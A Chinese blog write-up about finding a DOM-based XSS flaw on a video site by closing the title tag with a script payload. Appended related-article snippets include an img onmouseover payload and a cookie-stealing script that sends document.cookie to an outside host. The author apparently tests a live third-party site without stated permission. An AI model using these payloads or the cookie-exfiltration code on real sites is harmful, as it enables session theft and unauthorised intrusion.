DOM型XSS挖掘小记

本人单身狗一枚,这里要强调一下,我是哈士奇这种单身贵族,好了,进入正题

长夜漫漫,在这无聊的夜里,我打开了某个小网站准备看几部爱情动作片然后睡觉

当我打开影片搜索网页时,突然想起可以挖掘一下XSS或者是搜索型注入来玩玩

先直接插入<script>alert(1)</script>来测试一下:

发现搜索关键词输出的时候已经过滤了我们的关键词,GG,第一次测试失败

但是当我正准备关闭网页的时候,发现网站标题这里直接输出了搜索关键词,没有进行过滤,希望再一次出现,我查看了一下源代码:

注意第四行代码,第四行代码是网页的标题设置,可以看到这里没有对刚才的输入数据进行过滤

然后稍微构造了一下Payload: </title><script>alert(1)</script>

先用</title>标签闭合了之前的标题,然后插入了一段<script>代码,这里有一个技巧

就是<script>alert(1)</script>这段代码输出在<body>节点下和输出在<head>节点下都是可以正常弹出窗口的

然后插入我们新构造好的Payload在进行测试:

成功弹出了窗口,说明我们的XSS挖掘成功,但不是最初测试的反射型XSS,因为这里我们重新构造了一个节点,所以已经属于DOM型XSS的范围

XSS漏洞本身就比较好挖掘,但是很多安全研究者却挖掘不出XSS的原因无非几点原因:

1.没有认真思考如何构造Payload,或者是如何挖掘漏洞

2.对于Web前端知识掌握不够透彻,导致对于XSS漏洞理解不清晰,从而白白失去了很多挖掘漏洞的机会

本次的测试并没有多少干货,记叙下来也是为了提醒我和读者:

在挖掘漏洞时思维要放开,不能仅仅局限于漏洞的经典利用形式(例如我刚才直接插入Payload,并没有直接弹窗)

如果觉得一个地方很可能有漏洞,但是暂时无法利用,就需要认真思考如何绕过,如何构造Payload,

很多Web大牛并不是说基础知识有我们掌握的多么扎实,但是这些大牛善于思考,会思考,每次挖掘漏洞都会总结经验

这就是拉开差距的地方,本文也谨献给在Web安全道路上一直坚持的人,希望本文的一些思路可以给大家带来一些收获

时间: 2024-12-26 07:56:27

DOM型XSS挖掘小记的相关文章

小白日记49:kali渗透测试之Web渗透-XSS(三)-存储型XSS、DOM型XSS、神器BEFF

存储型XSS与DOM型XSS [XSS原理] 存储型XSS 1.可长期存储于服务器端 2.每次用户访问都会被执行js脚本,攻击者只需侦听指定端口 #攻击利用方法大体等于反射型xss利用 ##多出现在留言板等位置 *推荐使用burpsuite a.观察返回结果,是否原封不动地返回输入数据?是否有其他标签 js代码通过留言板存储在服务器中,所以每次点击留言板链接,都会弹出xss弹窗 b.测试加载攻击者控制的服务器中的js文件 #启动apache2[默认侦听80端口] a.js [盗取客户端cooki

DOM型XSS

打开漏洞页面,随便输入点东西,发现没有啥东西. 但是我们发现我们输入的11,在面的herf 中 看到这儿就很简单了,我们只需要闭合一下,就可以构造出我们的payload了. '><img src="#" onmouseover="alert('xss')"> 原文地址:https://www.cnblogs.com/kuaile1314/p/11373275.html

【安全牛学员笔记】存储型XSS和BEEF浏览器攻击框架

存储型XSS 长期存储于服务器端 每次用于访问都会被执行javascript脚本 Name:客户端表单长度限制 客户端.截断代理 <script src=http://1.1.1.1/a.js></script> a.js源码 var img = new Image(); img.src = "http://1.1.1.1:88/cookies.php?cookie="+documnet.cookie; [email protected]:~# netstat

DVWA-反射型XSS

0x01 XSS介绍 XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言.根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型XSS. DOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS.例如服务器端经常使用document.boby.in

exp2:// 一次存储型XSS从易到难的挖掘过程

一日在某站点发现一个找茬活动,感觉是另类的src就参与了一下.就发生了这次有趣的XSS测试过程. 0×00 开始 (注意1)XSS不仅存在于页面上直观所在的位置,所有用户输入的信息都有可能通过不同形式返回到页面上,因此直接操作数据包来查找XSS显得更加有效. 回到该站点,在该站点一处生成app处存在一处忘记过滤. 发送的数据包如下: appName=TEST&icon=&loadimage=%2Ftemplate201309%2F29%2Floadimage%2F1a8aaba1-42bd

存储型xss调研

概念 存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行. 常见的xss攻击方法 1. 绕过XSS-Filter,利用<>标签注入Html/JavaScript代码: 2. 利用HTML标签的属性值进行xss攻击.例如:<img src="javascript:alert('xss')"/>:(当然并不是所有的Web浏览器都支持Javascr

基于dom的xss漏洞原理

原文:http://www.anying.org/thread-36-1-1.html转载必须注明原文地址 最近看到网络上很多人都在说XSS我就借着暗影这个平台发表下自己对这一块的一些认识.其实对于XSS很多人都知道利用但是很多人都忽略了漏洞存在的原因,其实说白了基于dom中的XSS都是一些api代码审计不严所产生的,那么一下我就整理下可能存在基于dom的XSS攻击的api吧.document.locationdocument.URLdocument.URLUnencodeddocument.r

DOM based XSS Prevention Cheat Sheet(DOM Based XSS防御检查单)

本文为翻译版本,原文请查看 https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet 介绍 谈到XSS攻击,有三种公认的形式,Stored. Reflected 和 DOM Based XSS. XSS Prevention Cheatsheet可以有效地解决 Stored. Reflected XSS攻击, 本检查单解决了 DOM Based XSS攻击,是 XSS Prevention Cheatsheet 的延

DocCms存储型XSS+后台任意文件下载上传+目录删除+sql执行(有条件可getshell)

下载链接 https://share.weiyun.com/46ebceb4fe91da144ad2661522a941e1 留言处存储型XSS 漏洞在content/guestbook/index.php function create() { echo 123; global $db,$request; if ($_SESSION['verifycode'] != $request['checkcode']) { echo '<script>alert("请正确填写验证码!&qu